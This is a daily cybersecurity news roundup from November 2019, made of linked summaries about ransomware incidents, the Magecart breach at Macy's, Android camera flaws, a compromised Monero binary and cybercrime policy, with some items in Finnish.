Daily NCSC-FI news followup 2019-11-19

Why Were the Russians So Set Against This Hacker Being Extradited?

krebsonsecurity.com/2019/11/why-were-the-russians-so-set-against-this-hacker-being-extradited/ The Russian government has for the past four years been fighting to keep 29-year-old alleged cybercriminal Alexei Burkov from being extradited by Israel to the United States.. When Israeli authorities turned down requests to send him back to Russia supposedly to face separate hacking charges there the Russians then imprisoned an Israeli woman for seven years on trumped-up drug charges in a bid to trade prisoners.. That effort failed as well, and Burkov had his first appearance in a U.S. court last week. What follows are some clues that might explain why the Russians are so eager to reclaim this young man.

Collective Intelligence Podcast, Underground Markets

www.flashpoint-intel.com/blog/podcasts/collective-intelligence-podcast-underground-markets/ Underground markets continue to thrive across the internet. This is in spite of successful law enforcement action against a number of entities peddling anything from malware to drugs, as well as other markets self-imposed shutdowns due to economic pressures within the underground.. In this episode of the Collective Intelligence Podcast, Max and Ian discuss what they characterize as a tumultuous environment, and how buyers, sellers, and researchers react when these markets change.

The U.N. passed a resolution that gives Russia greater influence over internet norms

www.cyberscoop.com/un-resolution-internet-cybercrime-global-norms/ A cybercrime-focused resolution backed by Russia was passed Monday in the United Nations in New York, despite calls from the U.S. that the measure would further hamper efforts to root out crime on the internet.. The resolution, which passed 88-58 with 34 abstentions, aims to establish a group to examine cybercrime and set up a convention to prevent it. However, human rights groups have argued that the resolution is actually an effort by the Kremlin to expand its model of state-backed internet control.

Louisiana Government Suffers Outage Due to Ransomware Attack

www.bleepingcomputer.com/news/security/louisiana-government-suffers-outage-due-to-ransomware-attack/ The state government of Louisiana was hit by a ransomware attack today that impacted numerous state services including the Office of Motor Vehicles, the Department of Health, and the Department of Transportion and Development.

Down the Malware Rabbit Hole: Part II

blog.sucuri.net/2019/11/malware-rabbit-hole-part-2.html In our last post in this series, we took a look at a code snippet that had been encoded in a very specific way and hidden 91 layers deep.. Today, well reveal how attackers achieve this level of encoding and investigate one of the many possible tools they can use to conceal malware on compromised websites.

Pelimies Peter Vesterbacka manaa lupaviranomaisten hitautta miljoonapotin saaminen ulkomaalaisilta opiskelijoilta vaarassa

yle.fi/uutiset/3-11073611 Kourallinen ulkomaalaisia opiskelijoita pääosin Intiasta on päässyt aloittamaan kyberturvallisuuden insinöörikoulutuksen Salossa, Varsinais-Suomessa. Enemmänkin olisi tulossa, mutta lupien järjestyminen on osoittautunut oletettua hitaammaksi.. Koulutusvientiyritys Edunationin osaomistaja ja neuvonantaja Peter Vesterbacka arvostelee kovin sanoin suomalaista järjestelmää.. Onhan se ihan järkyttävää, että joutuu odottamaan seitsemän kuukautta saadakseen opiskella Suomessa. Meillä on jonossa satoja opiskelijoita, jotka ovat maksaneet kymppitonnin päästäkseen opiskelemaan Suomeen. Pahimmillaan koulut ovat joutuneet palauttamaan rahoja.

Macy’s Customer Payment Info Stolen in Magecart Data Breach

www.bleepingcomputer.com/news/security/macys-customer-payment-info-stolen-in-magecart-data-breach/ Macy’s has announced that they have suffered a data breach due to their web site being hacked with malicious scripts that steal customer’s payment information.. This type of compromise is called MageCart attack and consists of hackers compromising a web site so that they can inject malicious JavaScript scripts into various sections of the web site. These scripts then steal payment information that is submitted by a customer.. According to a ‘Notice of Data Breach’ issued by Macy’s, their web site was hacked on October 7th, 2019 and a malicious script was added to the ‘Checkout’ and ‘My Wallet’ pages. If any payment information was submitted on these pages while they were compromised, the credit card details and customer information was sent to a remote site under the attacker’s control.

Australia releases draft IoT cybersecurity code of practice

www.zdnet.com/article/australia-releases-draft-iot-cybersecurity-code-of-practice/#ftag=RSSbaffb68 The Australian government has released a draft code of practice for securing the Internet of Things (IoT), with a public consultation running until 1 March 2020.. The voluntary Code of Practice: Securing the Internet of Things for Consumers, published on Tuesday, is intended to provide industry with best-practice advice.

Buran Ransomware Infects PCs via Microsoft Excel Web Queries

www.bleepingcomputer.com/news/security/buran-ransomware-infects-pcs-via-microsoft-excel-web-queries/ A new spam campaign has been spotted distributing the Buran Ransomware through IQY file attachments. When opened, these Microsoft Excel Web Query attachments will execute a remote command that installs the ransomware onto a victim’s computer.

Databases for actual control system cyber incidents exist and they are important for many reasons

www.controlglobal.com/blogs/unfettered/databases-for-actual-control-system-cyber-incidents-exist-and-they-are-important-for-many-reasons/

Digitaalisen keskusteluympäristön arvaamattomuus näkyy myös poliisin työssä

www.poliisi.fi/tietoa_poliisista/tiedotteet/1/1/digitaalisen_keskusteluympariston_arvaamattomuus_nakyy_myos_poliisin_tyossa_85863 Älylaitteiden kehitys ja yleistyminen ovat tehostaneet ihmisten järjestäytymistä asiakysymysten taakse, mutta samalla erilaisten julkista keskustelua häiritsevien lieveilmiöiden kirjo on kasvanut. Tällaisia ilmiöitä ovat esimerkiksi ihmisten maalittaminen, keskustelun tahallinen häiriköinti, raju kielenkäyttö, trollaaminen ja disinformaatio.

Shade Ransomware Is the Most Actively Distributed Malware via Email

www.bleepingcomputer.com/news/security/shade-ransomware-is-the-most-actively-distributed-malware-via-email/ During the first half of 2019, the Shade Ransomware (also known as Troldesh) was the most actively distributed malware via malicious email phishing campaigns according to Singapore-based Group-IB security outfit.

Hacking and cyber espionage: The countries that are going to emerge as major threats in the 2020s

www.zdnet.com/article/hacking-and-cyber-espionage-the-countries-that-are-going-to-emerge-as-major-threats-in-the-2020s/#ftag=RSSbaffb68 Nation-state backed cyber groups have been responsible for major incidents over the last decade. And now more countries want the same power.

Until recently, weaknesses in Android camera apps from Google and Samsung made it possible for rogue apps to record video and audio and take images and then upload them to an attacker-controlled serverwithout any permissions to do so. Camera apps from other manufacturers may still be susceptible.

arstechnica.com/information-technology/2019/11/google-samsung-fix-android-spying-flaw-other-makers-may-still-be-vulnerable/Google also:

www.checkmarx.com/blog/how-attackers-could-hijack-your-android-camera. also: threatpost.com/google-android-camera-hijack-hack/150409/

Fake Windows Update Spam Leads to Cyborg Ransomware and Its Builder

www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/fake-windows-update-spam-leads-to-cyborg-ransomware-and-its-builder/ Recently, fake Microsoft Windows Update emails were spammed with the following subject lines: “Install Latest Microsoft Windows Update now!”, “Critical Microsoft Windows Update!”. The email, claiming to be from Microsoft, contains just one sentence in its email body which starts with two capital letters. It directs the recipients attention to the attachment as the latest critical update.

Cheap Chinese JAWS of DVR Exploitability on Port 60001

isc.sans.edu/forums/diary/Cheap+Chinese+JAWS+of+DVR+Exploitability+on+Port+60001/25530/ Looking at some local IP addresses in our database during class this week, I came across a host scanning exclusively for port 60001. Interestingly, we did see a marked increase in scans for this port in recent weeks.

Ransomware Bites 400 Veterinary Hospitals

krebsonsecurity.com/2019/11/ransomware-bites-400-veterinary-hospitals/ National Veterinary Associates (NVA), a California company that owns more than 700 animal care facilities around the globe, is still working to recover from a ransomware attack late last month that affected more than half of those properties, separating many veterinary practices from their patient records, payment systems and practice management software. NVA says it expects to have all facilities

Cybercriminals are Targeting your Entire Digital Footprint

www.fortinet.com/blog/industry-trends/cybercriminals-target-entire-digital-footprint.html The third quarter of 2019 saw a number of new cyberthreat trends emerge or expand, and organizations need to be aware of these trends if they wish to stay ahead of cybercriminal strategies. One of the most effective attacks strategies does not require cybercriminals to build new malware, but simply change their tactics.

Mispadu: Advertisement for a discounted Unhappy Meal

www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/ In this installment of our blog series, we will focus on Mispadu, an ambitious Latin American banking trojan that utilizes McDonalds malvertising and extends its attack surface to web browsers.. We believe this malware family is targeting the general public. Its main goals are monetary and credential theft. In Brazil, we have seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.

Official Monero website compromised with malware that steals funds

www.zdnet.com/article/official-monero-website-compromised-with-malware-that-steals-funds/#ftag=RSSbaffb68 Official Linux CLI binary for the Monero cryptocurrency compromised with malware that steals users’ funds.

Data Theft at Cayman National in the Isle of Man

www.caymannational.im/news/banking/data-theft-at-cayman-national-in-the-isle-of-man Cayman National Bank (Isle of Man) Limited, together with its sister company Cayman National Trust Company (Isle of Man) Limited, confirms that it has experienced a data hack. Responsibility for the data theft was claimed by a criminal hacking group on Sunday 17 November 2019.. also: https://twitter.com/DDoSecrets/status/1195899716653010945

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.